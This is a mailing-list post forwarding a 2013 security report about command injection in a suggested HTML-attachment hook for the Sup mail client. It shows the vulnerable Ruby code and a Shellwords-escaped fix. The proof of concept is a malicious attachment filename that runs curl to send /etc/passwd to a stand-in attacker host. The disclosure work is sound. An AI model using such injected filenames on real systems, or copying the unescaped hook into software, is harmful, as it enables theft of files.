Greetings suppers, joernchen has pointed out to me that our suggested hook for viewing html attachment has a serious security issue. The updated suggestion in [0] (wiki) should be safer.
Please make sure that you update your mime-decode hook! Best regards, Gaute [0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments --- Begin forwarded message from joernchen --- From: joernchen <...> To: eg <e...@gaute.vetsj.com> Date: Sat, 17 Aug 2013 14:14:29 +0200 Subject: Security issue with suggested configuration of sup [...] At [0] the suggested configuration for viewing HTML attachments with sup using the mime-decode hook is given as follows: unless sibling_types.member? "text/plain" case content_type when "text/html" `/usr/bin/w3m -dump -T #{content_type} '#{filename}'` end end This piece of code however is prone to command injection via the file name of the attached file. The command injection triggers upon sup indexing the mail, so no user interaction is needed. A better approach would be the following: require 'shellwords' unless sibling_types.member? "text/plain" case content_type when "text/html" `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}` end end [...] A simple PoC would be sending an email with a file attachment named like: '$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd attacker.org)'.html to a sup user making use of the suggested decode hook. [0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments [...] _______________________________________________ Sup-devel mailing list Sup-devel@rubyforge.org http://rubyforge.org/mailman/listinfo/sup-devel
